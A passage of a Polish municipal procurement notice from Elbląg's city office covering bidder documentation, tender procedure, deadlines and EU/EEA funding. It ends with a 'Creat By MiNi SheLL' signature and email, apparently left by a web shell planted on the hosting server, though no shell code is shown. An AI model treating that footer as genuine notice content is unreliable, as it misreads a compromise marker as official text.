       dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.7. SIWZ - Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Uwaga:
a)	 Dla osób wymienionych w wykazie osób, o którym mowa w pkt VI. ppkt 1.5. SIWZ, należy złożyć z
           ofertą dokumenty: decyzje o nadaniu uprawnień oraz aktualne zaświadczenia o przynależności do  
           właściwej okręgowej izby samorządu zawodowego.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

UWAGA:

1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu Wydział Zamówień Publicznych
                 82-300 Elbląg,  ul. Łączności 1, pokój nr 125.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający informuje, że Projekt jest dofinansowywany ze środków Mechanizmu Finansowego 
    Europejskiego Obszaru Gospodarczego.
2. Dotyczy Sekcji II.2) ogłoszenia  CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
    data rozpoczęcia: 	w dniu przekazania placu budowy
    data zakończenia: 	25 sierpnia 2009 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com